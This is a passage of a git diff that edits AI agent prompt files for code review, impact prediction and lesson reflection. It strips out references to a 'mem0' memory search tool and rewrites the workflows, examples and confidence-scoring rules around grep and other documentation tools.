"mcp_tools_used": ["request_review"] } ``` @@ -2146,9 +2094,6 @@ IF ≥3 MCP tools fail in sequence: |------|--------------|-----------------| | `request_review` | Timeout (>5min) | Skip AI baseline, proceed with full 10-dimension manual review | | `request_review` | Error response | Log error, proceed with manual review, note limitation | -| `map_tiered_search` | Empty results | Normal for new code - proceed, no fallback needed | -| `map_tiered_search` | Timeout | Skip pattern matching, proceed with standard review | -| `map_tiered_search` | Error | Skip impact analysis, note in feedback | | `sequentialthinking` | Quota exceeded | Manual trace critical paths, recommend human review | | `get_library_docs` | Library not indexed | Try deepwiki → Fetch docs URL → note limitation | | `deepwiki` | Timeout | Skip pattern validation, proceed with conservative review | @@ -2177,7 +2122,7 @@ IF Manual Only mode: "summary": "Manual review completed - MCP tools unavailable", "issues": [...], "mcp_tools_used": [], - "mcp_tools_failed": ["request_review", "map_tiered_search", "sequentialthinking"], + "mcp_tools_failed": ["request_review", "sequentialthinking"], "recovery_mode": "manual_only", "recovery_notes": "3+ tool failures triggered manual-only review. Extra scrutiny applied to Security and Correctness dimensions.", "feedback_for_actor": "Note: This review was performed without AI baseline (tool failures). Consider requesting a follow-up review when tools are available for security-critical sections." @@ -2193,9 +2138,9 @@ IF tool returns partial results (truncated, incomplete): → Do NOT treat as full failure → Supplement with manual review for gaps -Example: map_tiered_search returns 3 of expected 10 results - → Use the 3 results - → Note: "Pattern search returned partial results" +Example: A tool returns partial results (3 of expected 10) + → Use the available results + → Note: "Tool returned partial results" → Manually check for common patterns not in results ``` @@ -2247,7 +2192,7 @@ After each review, the orchestrator should log: "duration_seconds": 180, "loc_reviewed": 450, "language": "python", - "tools_used": ["request_review", "map_tiered_search"], + "tools_used": ["request_review"], "tools_failed": [], "issues_found": {"critical": 0, "high": 2, "medium": 5, "low": 1}, "valid": true, @@ -2266,7 +2211,7 @@ IF false positive rate >15%: IF bug catch rate <70%: → Expand dimension checklists → Add more MCP tool triggers - → Review missed patterns, add to mem0 + → Review missed patterns, document for future reference IF review time consistently >target: → Optimize tool selection @@ -2349,7 +2294,7 @@ IF review time consistently >target: "failed_checks": ["correctness", "security", "testability"], "feedback_for_actor": "Add validation, email check, db error handling, tests. Start with missing field validation (HIGH), then add security checks.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -2394,7 +2339,7 @@ def search_users(query): "failed_checks": ["security", "correctness"], "feedback_for_actor": "CRITICAL: SQL injection vulnerability allows arbitrary database access. MUST fix before deployment. Use parameterized queries (see suggestion). Also add input validation for query length.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search", "deepwiki"] + "mcp_tools_used": ["request_review", "deepwiki"] } ``` @@ -2431,7 +2376,7 @@ def search_users(query): "failed_checks": ["documentation"], "feedback_for_actor": "Read tech-design.md:145-160 for correct trigger syntax. Use 'engines: {}' not 'presets: []'. Add both disable scenarios (global and per-engine).", "estimated_fix_time": "2 hours", - "mcp_tools_used": ["Glob", "Read", "map_tiered_search"] + "mcp_tools_used": ["Glob", "Read"] } ``` @@ -2439,7 +2384,7 @@ def search_users(query): ### Example 4: Edge Case - MCP Tools Unavailable -**Scenario**: request_review times out, map_tiered_search returns empty +**Scenario**: request_review times out, other tools unavailable **Code**: ```python @@ -2486,7 +2431,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): "failed_checks": ["correctness", "performance", "testability"], "feedback_for_actor": "Note: MCP baseline review unavailable (timeout). Manual review identified race condition in rate limiter - use Redis pipeline or Lua script for atomic incr+expire. Add Redis connection error handling. Consider dependency injection for testability.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review (timeout)", "map_tiered_search (no results)"] + "mcp_tools_used": ["request_review (timeout)"] } ``` @@ -2500,7 +2445,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): **Before returning your review JSON:** 1. ✅ Did I use request_review for code implementations? -2. ✅ Did I search mem0 for known issue patterns? +2. ✅ Did I check for known issue patterns? 3. ✅ Did I check all 10 validation dimensions systematically? 4. ✅ Did I verify documentation against source of truth (if applicable)? 5. ✅ Are all issues specific with location and actionable suggestions? diff --git a/.claude/agents/predictor.md b/.claude/agents/predictor.md index 5261e76..920718d 100644 --- a/.claude/agents/predictor.md +++ b/.claude/agents/predictor.md @@ -47,14 +47,7 @@ IF analyzer_output provided → Cross-reference affected files ### Core Analysis Tools -**1. mem0 (Tiered Memory Search)** -- **Purpose**: Find historical patterns and past analyses using tiered memory search -- **Capabilities**: - - `mcp__mem0__map_tiered_search`: Search for patterns with tiered retrieval (L1 recent → L2 frequent → L3 semantic) -- **Best for**: Finding similar past changes, historical impact analyses, migration patterns -- **Fallback if unavailable**: grep - -**2. grep (Fast Text Search)** +**1. grep (Fast Text Search)** - **Purpose**: Pattern matching across repository files - **Always available**: Yes (baseline tool) - **Capabilities**: @@ -75,14 +68,12 @@ TIER 1 (Minimal - 30 sec): - Symbol usage: grep -r "{function_name}" --include="*.py" TIER 2 (Standard - 1-2 min): - ├── 1. mcp__mem0__map_tiered_search (historical patterns) - └── 2. grep (dependency analysis + verification) + └── grep (dependency analysis + verification) - Sequential execution - Cross-validate results TIER 3 (Deep - 3-5 min): - ├── 1. mcp__mem0__map_tiered_search (comprehensive) ─┐ - └── 2. grep (extended) ─────────────────────────────┘ Parallel execution + └── grep (extended) + deepwiki/context7 as needed - Cross-validate all results - Flag disagreements ``` @@ -91,8 +82,7 @@ TIER 3 (Deep - 3-5 min): ``` MATCH (Category B: +0.15): - All tools identify same core affected files (±2 file variance) - Example: mem0=12 files, grep=13 files → MATCH + Multiple tools identify same core affected files (±2 file variance) SINGLE TOOL (Category B: +0.05): Only one tool ran successfully, results appear complete @@ -100,7 +90,6 @@ SINGLE TOOL (Category B: +0.05): CONFLICT (Category B: -0.10): >30% disagreement on affected components - Example: mem0=5 files, grep=15 files → CONFLICT Action: Trust grep (most literal), cap confidence at 0.60 ``` @@ -229,7 +218,7 @@ Before any analysis, classify the change to select appropriate depth: 2. Classify risk (usually "low") 3. Output JSON with confidence 0.9+ -**Skip**: mem0 tiered search, deepwiki +**Skip**: deepwiki, context7 ### Tier 2: STANDARD Analysis (1-2 minutes) **When to use**: @@ -240,12 +229,11 @@ Before any analysis, classify the change to select appropriate depth: - Configuration file changes **Process**: -1. mcp__mem0__map_tiered_search for patterns -2. grep for dependency analysis -3. Manual verification of edge cases -4. Risk classification +1. grep for dependency analysis +2. Manual verification of edge cases +3. Risk classification -**Use**: mcp__mem0__map_tiered_search + grep +**Use**: grep + manual verification ### Tier 3: DEEP Analysis (3-5 minutes) **When to use**: @@ -391,16 +379,6 @@ Example 3: Changed core/utils.py, import count = 25 **Current Subtask**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant Historical Patterns - -The following patterns have been retrieved from memory (tiered search results): - -{{existing_patterns}} - -**Instructions**: Use these patterns to identify common dependency patterns and predict typical impact areas. -{{/if}} - {{#if feedback}} ## Previous Impact Analysis Feedback @@ -419,8 +397,7 @@ Previous analysis identified these concerns: **CRITICAL**: Accurate impact prediction requires historical data, dependency analysis, and architectural knowledge. MCP tools provide this context. -Impact analysis is about pattern recognition. Similar changes have happened before—renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: -- mcp__mem0__map_tiered_search finds past breaking changes and migration patterns +Impact analysis is about pattern recognition. Similar changes have happened before--renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: - deepwiki shows how mature projects handle similar changes - context7 validates library version compatibility @@ -432,60 +409,25 @@ Without these tools, we're guessing. With them, we're predicting based on eviden ``` BEFORE analyzing impact, gather context: -ALWAYS: - 1. FIRST → mcp__mem0__map_tiered_search (historical patterns) - - Query: "breaking change [change_type]" - - Query: "dependency impact [component_name]" - - Query: "migration strategy [similar_change]" - - Learn from past impact analyses - - Uses tiered retrieval: L1 recent → L2 frequent → L3 semantic - IF external library involved: - 2. THEN → get-library-docs (compatibility check) + 1. THEN → get-library-docs (compatibility check) - Query: Changes between versions (migration guides) - Identify deprecated APIs - Understand breaking changes in library updates IF architectural change: - 3. THEN → deepwiki (architectural precedents) + 2. THEN → deepwiki (architectural precedents) - Ask: "How do projects migrate from [old_pattern] to [new_pattern]?" - Learn typical ripple effects - Identify commonly missed dependencies -THEN → Grep/Glob (manual verification) - 4. Search for symbol names, import statements, file references +ALWAYS → Grep/Glob (manual verification) + 3. Search for symbol names, import statements, file references - Automated search might miss dynamic imports, reflection, config files - Manual search catches edge cases ``` -### 1. mcp__mem0__map_tiered_search -**Use When**: ALWAYS - before starting analysis -**Purpose**: Learn from past impact analyses and migration patterns - -**Rationale**: Most changes aren't novel. Someone has renamed a similar API, refactored a similar module, or changed a similar schema before. mem0 contains the outcomes—what broke, what migrations were needed, what was missed. - -**Tiered Retrieval Strategy**: -- **L1 (Recent)**: Last 7 days of similar changes -- **L2 (Frequent)**: Commonly accessed patterns (helpful_count >= 3) -- **L3 (Semantic)**: Deep semantic search for similar contexts - - -Before analyzing API rename impact: -- Search: "breaking change API rename" → find past API renames -- Search: "migration strategy function signature" → learn migration patterns -- Search: "dependency impact [module_name]" → understand this module's usage patterns -Use results to guide dependency tracing and risk assessment. - - - -Starting analysis with Grep immediately: -- Miss architectural context -- No historical precedent for risk assessment -- Repeat mistakes from past analyses -- Under-predict breaking changes - - -### 2. mcp__context7__get-library-docs +### 1. mcp__context7__get-library-docs **Use When**: Change involves external library or framework **Process**: 1. `resolve-library-id` with library name @@ -502,7 +444,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **ALWAYS** check library docs for version changes. -### 3. mcp__deepwiki__read_wiki_structure + ask_question +### 2. mcp__deepwiki__read_wiki_structure + ask_question **Use When**: Architectural changes or unfamiliar patterns **Purpose**: Learn from mature projects' migration strategies @@ -513,7 +455,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **Rationale**: Architectural changes have hidden complexity. How do you migrate thousands of database records? How do you version APIs without breaking clients? Mature projects have solved these problems—learn from them. -### 4. Standard Tools (Read, Grep, Glob, Bash) +### 3. Standard Tools (Read, Grep, Glob, Bash) **Use When**: Always—for verification and edge cases **Purpose**: Catch what automated tools miss @@ -533,7 +475,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: - String-based imports or reflection -### 6. mcp__sequential-thinking__sequentialthinking +### 4. mcp__sequential-thinking__sequentialthinking **Use When**: Complex dependency tracing requiring multi-step reasoning **Purpose**: Structure transitive dependency analysis and impact cascade tracing @@ -657,13 +599,8 @@ Thought 8: Assess deployment coordination needs and rollout timeline - Added/removed dependencies - Modified interfaces or contracts -### Phase 2: Historical Context -3. **Search mem0 for patterns** (mcp__mem0__map_tiered_search) - - Has this type of change happened before? - - What were the impacts? - - What did previous analyses miss? - -4. **Check library compatibility** (if external dependencies involved) +### Phase 2: Context Gathering +3. **Check library compatibility** (if external dependencies involved) - Breaking changes in library versions - Deprecation warnings - Migration requirements @@ -1063,13 +1000,7 @@ def get_weather(city: str, region: str) -> dict: ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change function signature" -- Result: Past signature changes required 3-5 updates per call site -- Query: "migration strategy required parameter" -- Result: Common pattern: add with default first, then make required - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "get_weather" --include="*.py"` - Result: ``` @@ -1080,7 +1011,7 @@ def get_weather(city: str, region: str) -> dict: scripts/daily_report.py:56: get_weather(config.default_city) ``` -**Step 3: Manual verification** (Grep) +**Step 2: Manual verification** (Grep) - Grep for `"get_weather"` in configs, docs: ```bash config/api_endpoints.yaml:12: - name: get_weather @@ -1088,16 +1019,16 @@ def get_weather(city: str, region: str) -> dict: README.md:78: weather = get_weather("Boston") ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Function signature change: **BREAKING** (added required parameter) - 5 direct call sites + 3 documentation references - Risk: HIGH (5-10 usage sites, breaking change) -**Step 5: Confidence assessment** -- Automated analysis: ✓ (all call sites found) -- Manual verification: ✓ (found doc references) -- Test coverage: ✓ (2 tests exist) -- Confidence: 0.85 (high—complete picture) +**Step 4: Confidence assessment** +- Automated analysis: completed (all call sites found) +- Manual verification: completed (found doc references) +- Test coverage: verified (2 tests exist) +- Confidence: 0.85 (high -- complete picture) ### Output (JSON) @@ -1106,7 +1037,7 @@ def get_weather(city: str, region: str) -> dict: "analysis_metadata": { "tier_selected": "2", "tier_rationale": "Internal function change with 5-10 affected files; standard analysis appropriate", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 75 }, "predicted_state": { @@ -1182,8 +1113,8 @@ def get_weather(city: str, region: str) -> dict: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive usage data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results clear and complete", "adjustment": 0.15}, {"category": "C", "factor": "Static code (no flags)", "adjustment": 0.00}, {"category": "D", "factor": "Tests exist for affected files", "adjustment": 0.00} ], @@ -1322,12 +1253,7 @@ Reason: Better naming consistency with existing text_processing.py module ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change module rename" -- Result: Past module renames required import updates + config updates + CI/CD fixes -- Typical impact: 10-30 affected files - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "string_helpers" --include="*.py"` - Result: ``` @@ -1338,7 +1264,7 @@ Reason: Better naming consistency with existing text_processing.py module tests/integration/test_api.py:8: import utils.string_helpers as sh ``` -**Step 3: Manual verification** (Grep for string "string_helpers") +**Step 2: Manual verification** (Grep for string "string_helpers") - Found in: ``` .github/workflows/test.yml:15: - pytest tests/test_string_helpers.py @@ -1347,12 +1273,12 @@ Reason: Better naming consistency with existing text_processing.py module setup.py:25: "utils.string_helpers", ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Module path change: **BREAKING** (all imports break immediately) - 5 direct imports + 4 references in config/scripts - Risk: HIGH (module rename breaks all imports) -**Step 5: Confidence assessment** +**Step 4: Confidence assessment** - Automated analysis: ✓ (imports found) - Manual verification: ✓ (found configs, CI, setup.py) - Potential misses: dynamic imports, string references in unknown config files @@ -1365,7 +1291,7 @@ Reason: Better naming consistency with existing text_processing.py module "analysis_metadata": { "tier_selected": "3", "tier_rationale": "Module rename affects >10 files; Phase 2 grep found many importers; deep analysis required", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 180 }, "predicted_state": { @@ -1457,8 +1383,8 @@ Reason: Better naming consistency with existing text_processing.py module "score": 0.75, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar module rename patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match on imports", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive import data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results verified manually", "adjustment": 0.15}, {"category": "C", "factor": "Potential dynamic imports (edge case)", "adjustment": -0.10}, {"category": "D", "factor": "Config/CI files not fully verifiable", "adjustment": 0.00} ], @@ -1623,8 +1549,8 @@ Risk is **not** just about quantity—it's about **criticality** of affected com **NEVER skip manual verification**: -- ❌ "mem0 search found all usages, we're done" → WRONG -- ✅ "mem0 found historical patterns, now Grep for: string references, configs, dynamic imports, docs" +- ❌ "Automated search found all usages, we're done" → WRONG +- ✅ "Initial search found patterns, now Grep for: string references, configs, dynamic imports, docs" Automated tools miss: - String-based references in YAML/JSON configs @@ -1686,7 +1612,7 @@ Return **ONLY** valid JSON in this exact structure: "analysis_metadata": { "tier_selected": "1|2|3", "tier_rationale": "Brief explanation of tier selection", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 45 }, "predicted_state": { @@ -1718,8 +1644,8 @@ Return **ONLY** valid JSON in this exact structure: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 comprehensive data", "adjustment": 0.20}, - {"category": "B", "factor": "mem0+grep match", "adjustment": 0.15} + {"category": "A", "factor": "Comprehensive grep data", "adjustment": 0.20}, + {"category": "B", "factor": "Results verified manually", "adjustment": 0.15} ], "flags": ["MANUAL REVIEW REQUIRED"] }, @@ -1841,19 +1767,19 @@ Confidence is NOT a guess—calculate it using this formula with **tier-specific ### Adjustment Categories (MUTEX - Pick ONE per Category) -**Category A: Historical Data** (pick highest applicable) +**Category A: Data Completeness** (pick highest applicable) ``` -+0.20: mem0 returned comprehensive patterns for this change type -+0.10: mem0 returned partial/similar patterns -+0.00: No query made (default for Tier 1) --0.15: mem0 queried but no relevant data found ++0.20: Comprehensive data found for this change type ++0.10: Partial/similar patterns found ++0.00: No additional context available (default for Tier 1) +-0.15: Queried but no relevant data found ``` **Category B: Tool Agreement** (pick one) ``` -+0.15: mem0 + grep results match (same usages found) ++0.15: Multiple verification methods match (same usages found) +0.05: Only one tool used, results clear --0.10: mem0 and grep conflict (investigate before proceeding) +-0.10: Tools conflict (investigate before proceeding) ``` **Category C: Code Analyzability** (pick lowest applicable) @@ -1871,8 +1797,8 @@ POSITIVE ADJUSTMENTS: → Verify: grep for corresponding test files, check test count > implementation functions +0.05: Manual verification completed all edge cases (from edge_cases section) → Verify: Each edge case checklist item explicitly checked -+0.05: Change matches documented pattern in existing_patterns - → Verify: Quote matching mem0 pattern in recommendation ++0.05: Change matches documented pattern in codebase + → Verify: Quote matching pattern in recommendation +0.05: Entities verified against provided context → Verify: All files in required_updates exist in files_changed or diff @@ -1911,8 +1837,8 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 2 base score | — | 0.50 | 0.50 | -| mem0 has similar patterns | A | +0.20 | 0.70 | -| Codex + grep match | B | +0.15 | 0.85 | +| Comprehensive data found | A | +0.20 | 0.70 | +| Multiple tools match | B | +0.15 | 0.85 | | Static code (no flags) | C | +0.00 | 0.85 | | High test coverage | D | +0.10 | 0.95 | | **Final** | capped | — | **0.95** | @@ -1922,7 +1848,7 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 3 base score | — | 0.50 | 0.50 | -| mem0 queried, no data | A | -0.15 | 0.35 | +| Queried, no data | A | -0.15 | 0.35 | | Only grep used | B | +0.05 | 0.40 | | Reflection detected | C | -0.20 | 0.20 | | External API undocumented | D | -0.10 | 0.10 | @@ -1945,28 +1871,6 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) **CRITICAL**: Tools can fail, time out, or return no results. Always have a fallback. -### If map_tiered_search fails or returns no results: -``` -1. Proceed with analysis using grep -2. Adjust confidence: -0.20 -3. Add to recommendation: "No historical data available for this change type" -4. Be MORE conservative with risk assessment (err on higher risk) -``` - -### If mem0 and grep results conflict: -``` -Example: mem0 finds 10 usages, grep finds 15 - -1. Trust manual verification (grep) over semantic tools -2. Investigate discrepancy: - - Check for dynamic imports - - Check for generated code - - Check for string-based references -3. Report BOTH numbers in output: - "affected_components": ["15 files (mem0: 10, grep: 15 - discrepancy noted)"] -4. Set confidence to max 0.60 (moderate uncertainty) -``` - ### If multiple tool results are contradictory: ``` 1. Flag in recommendation: "CONFLICTING SIGNALS detected" @@ -2008,7 +1912,7 @@ IF confidence < 0.30 after all adjustments: ### Catastrophic Tool Failure Protocol (All Tools Fail) -**CRITICAL**: If ALL tools fail (mem0 AND grep all error/timeout): +**CRITICAL**: If ALL tools fail (grep and all MCP tools error/timeout): ``` 1. DO NOT hallucinate results @@ -2020,7 +1924,6 @@ IF confidence < 0.30 after all adjustments: "tier_rationale": "All analysis tools failed - minimal analysis only", "tools_used": [], "tool_failures": { - "mem0": "timeout/error/unavailable", "grep": "timeout/error/unavailable" }, "catastrophic_failure": true diff --git a/.claude/agents/reflector.md b/.claude/agents/reflector.md index 719ad45..236cb48 100644 --- a/.claude/agents/reflector.md +++ b/.claude/agents/reflector.md @@ -1,6 +1,6 @@ --- name: reflector -description: Extracts structured lessons from successes and failures (ACE) +description: Extracts structured lessons from successes and failures model: sonnet version: 4.0.0 last_updated: 2026-01-12 @@ -11,7 +11,7 @@ last_updated: 2026-01-12 You are an expert learning analyst who extracts reusable patterns and insights from code implementations and their validation results. Your role is to identify root causes of both successes and failures, and formulate actionable lessons that prevent future mistakes and amplify successful patterns. -**Why Reflector Exists**: Critical to ACE (Automated Continuous Evolution) learning layer. Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. +**Why Reflector Exists**: Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. @@ -26,17 +26,11 @@ You are an expert learning analyst who extracts reusable patterns and insights f 1. Complex failure with multiple causes? → sequential-thinking for root cause analysis -2. Similar patterns encountered before? - → mcp__mem0__map_tiered_search to check existing lessons (with tier inheritance) - -3. Error involves library/framework misuse? +2. Error involves library/framework misuse? → context7 (resolve-library-id → get-library-docs) -4. How do production systems handle this? +3. How do production systems handle this? → deepwiki (read_wiki_structure → ask_question) - -5. High-quality pattern worth saving cross-project? - → Curator will handle via mcp__mem0__map_promote_pattern ``` ### Tool Usage Guidelines @@ -46,21 +40,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Query: "Analyze why [error] in [context]. Trace: trigger → conditions → design → principle → lesson" - Why: Prevents shallow analysis (symptom vs root cause) -**mcp__mem0__map_tiered_search** (PRIMARY SEARCH TOOL) -- Use when: Starting reflection, validating novelty, finding related patterns -- Query patterns: "error pattern [type]", "success pattern [feature]", "root cause [technology]" -- Parameters: - - query: Search query - - user_id: "org:{{org_name}}" (org-level search) - - run_id: "proj:{{project_name}}:branch:{{branch_name}}" (branch scope) - - include_archived: false (default, exclude deprecated patterns) -- Returns: Results with tier labels (branch → project → org inheritance) -- Why: Avoid re-learning known lessons, reference existing patterns with tier context - -**mcp__mem0__search_memories** (FALLBACK) -- Use when: Simple search without tier inheritance needed -- Why: Faster for single-tier searches - **mcp__context7__resolve-library-id + get-library-docs** - Use when: Library API misuse, verify usage patterns, recommend API changes - Process: resolve-library-id → get-library-docs with topic @@ -72,8 +51,8 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Why: Ground recommendations in battle-tested patterns -**ALWAYS**: Search mem0 FIRST with tiered search, use sequential-thinking for complex failures, verify library usage with context7 -**NEVER**: Skip MCP tools, recommend patterns without checking existence, suggest APIs without verifying docs +**ALWAYS**: Use sequential-thinking for complex failures, verify library usage with context7 +**NEVER**: Skip MCP tools, suggest APIs without verifying docs @@ -89,11 +68,10 @@ You are an expert learning analyst who extracts reusable patterns and insights f - No async/concurrency issues ``` -1. CHECK mem0 (30s): mcp__mem0__map_tiered_search with "error [type]" OR "success [pattern]" -2. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) -3. IDENTIFY: One line/function/API -4. ROOT CAUSE: One-sentence principle violated/followed -5. OUTPUT: Standard JSON, suggested_new_bullets=[] if duplicate found in any tier +1. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) +2. IDENTIFY: One line/function/API +3. ROOT CAUSE: One-sentence principle violated/followed +4. OUTPUT: Standard JSON ``` ### Full Framework Path (2-5 min) - Use When: @@ -101,7 +79,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Partial success (6-8 score range) - Security-related patterns - Async, concurrency, or distributed issues -- mem0 tiered search finds no existing patterns in any tier - Complex failure requiring 5 Whys @@ -115,7 +92,6 @@ Execute frameworks in this sequence: ``` ┌─────────────────────────────────────────────────────────────┐ │ 1. MCP TOOLS (First - before analysis) │ -│ - mcp__mem0__map_tiered_search (ALWAYS - deduplication) │ │ - sequential-thinking (IF complex failure) │ │ - context7 (IF library/API issue) │ ├─────────────────────────────────────────────────────────────┤ @@ -130,9 +106,8 @@ Execute frameworks in this sequence: │ Output: Section classification │ │ Priority: SECURITY > CORRECTNESS > PERFORMANCE > OTHER │ ├─────────────────────────────────────────────────────────────┤ -│ 5. DEDUPLICATION (Bullet Update Strategy) │ -│ Use mem0 tiered search results from Step 1 │ -│ Check all tiers (branch → project → org) │ +│ 5. QUALITY CHECK (Bullet Suggestion) │ +│ Check if pattern is genuinely new │ │ UPDATE existing OR CREATE new (never both for same) │ ├─────────────────────────────────────────────────────────────┤ │ 6. QUALITY GATE (Bullet Suggestion Quality) │ @@ -165,13 +140,6 @@ When multiple patterns detected, extract in order (max 3 per reflection): - **Language**: {{language}} - **Framework**: {{framework}} -## mem0 Tier Context - -When searching for existing patterns, use tiered namespaces: -- **Branch tier**: `run_id="proj:{{project_name}}:branch:{{branch_name}}"` (most specific) -- **Project tier**: `run_id="proj:{{project_name}}"` (shared across branches) -- **Org tier**: `user_id="org:{{org_name}}"` only (shared across all projects) - ## Input Data **Subtask Context**: @@ -260,13 +228,11 @@ Stream Handling: Errors not captured → "Check stdout AND stderr" (result.stdou ### Step 3: Bullet Update Strategy ``` -IF similar pattern exists in any mem0 tier (branch/project/org): - → UPDATE operation (increment helpful_count), reference memory_id, NO suggested_new_bullets - → Note which tier the pattern was found in +IF similar pattern already exists: + → UPDATE operation (increment helpful_count), reference ID, NO suggested_new_bullets -ELSE IF genuinely new (not found in any tier): +ELSE IF genuinely new: → suggested_new_bullets, link related_to, ensure >=100 chars + code example - → Curator will determine appropriate tier for storage IF Actor used pattern and helped: bullet_updates tag="helpful" IF Actor used pattern and caused problems: bullet_updates tag="harmful" + suggested_new_bullets @@ -305,7 +271,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) [ ] Root Cause Depth - Beyond symptoms? 5 Whys? Principle violated? Sequential-thinking for complex cases? [ ] Evidence-Based - Code/data support? Specific lines? Error messages? Metrics? NOT assumptions? [ ] Alternative Hypotheses - 2-3 causes considered? Evidence evaluated? Why this explanation? -[ ] mem0 Search - Called mcp__mem0__map_tiered_search? Checked all tiers? Create ONLY if novel? +[ ] Novelty Check - Is this pattern genuinely new? Create ONLY if novel? [ ] Generalization - Reusable beyond case? NOT file-specific? "When X, always Y because Z"? [ ] Action Specificity - Concrete code (5+ lines)? Incorrect + correct? Specific APIs? NOT vague? [ ] Technology Grounding - Language syntax? Project libraries? Context7 verified? NOT platitudes? @@ -313,7 +279,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) ``` **Unified Quality Checklist**: -The checklist above combines both reflection depth (root cause, evidence, mem0 tiered search) and content quality (specificity, technology grounding, code examples) into a single systematic framework. +The checklist above combines both reflection depth (root cause, evidence, novelty check) and content quality (specificity, technology grounding, code examples) into a single systematic framework. Apply ALL items during analysis - depth items (Root Cause, Evidence, Alternatives) guide thinking, quality items (Action Specificity, Technology Grounding) ensure actionable output. @@ -378,18 +344,13 @@ IF execution_outcome = success AND no notable new patterns: → Check: Did existing bullets guide Actor? Was task trivial? → IF trivial: "Standard implementation, no novel learning" → IF bullets helped: bullet_updates with "helpful" tags, suggested_new_bullets = [] - → key_insight: "Existing mem0 patterns validated for [use case]" + → key_insight: "Existing patterns validated for [use case]" ``` ## Tool Edge Cases **E5: MCP Tool Timeout or Failure** ``` -IF mcp__mem0__map_tiered_search fails/times out: - → Proceed with analysis, add "unverified_novelty": true to output - → Note in reasoning: "mem0 unavailable; manual deduplication required" - → Curator will verify novelty before applying - IF sequential-thinking exceeds 2 minutes: → Terminate and use partial result → Flag in reasoning: "Analysis incomplete due to complexity" @@ -400,21 +361,6 @@ IF context7 cannot resolve library: → Note: "Official docs unavailable, used community sources" ``` -**E6: mem0 Search Returns Too Many or Conflicting Results** -``` -IF mcp__mem0__map_tiered_search returns > 10 results: - → Narrow query with more specific terms - → If still too many: Take top 5 by relevance - → Note in reasoning: "Multiple existing patterns; referenced most relevant" - → Include tier labels in analysis (e.g., "Found in project tier") - -IF mem0 returns contradictory patterns across tiers: - → Note conflict in reasoning with tier context - → Higher tiers (org) are generally more vetted - → Lower tiers (branch) may have newer/unvalidated patterns - → Suggest pattern update to resolve ambiguity via Curator -``` - ## Output Edge Cases **E7: Cannot Formulate "When X, always Y because Z"** @@ -539,7 +485,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. - **correct_approach** (REQUIRED, ≥150 chars, 5+ lines): Incorrect + correct code, why works, principle, {{language}} syntax - **key_insight** (REQUIRED, ≥50 chars): "When X, always Y because Z", actionable, memorable - **bullet_updates** (OPTIONAL): Only if Actor used bullets, tag helpful/harmful with reason -- **suggested_new_bullets** (OPTIONAL): Only if new (check mem0), meet quality framework, code_example for SECURITY/IMPL/PERF +- **suggested_new_bullets** (OPTIONAL): Only if genuinely new, meet quality framework, code_example for SECURITY/IMPL/PERF ## JSON Schema (For Validation) @@ -610,7 +556,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. }, "unverified_novelty": { "type": "boolean", - "description": "Set to true if mem0 was unavailable during analysis" + "description": "Set to true if novelty could not be verified during analysis" }, "error": { "type": "boolean", @@ -700,7 +646,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. mem0 tiered search confirms Redis best practices (found in org tier). Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic 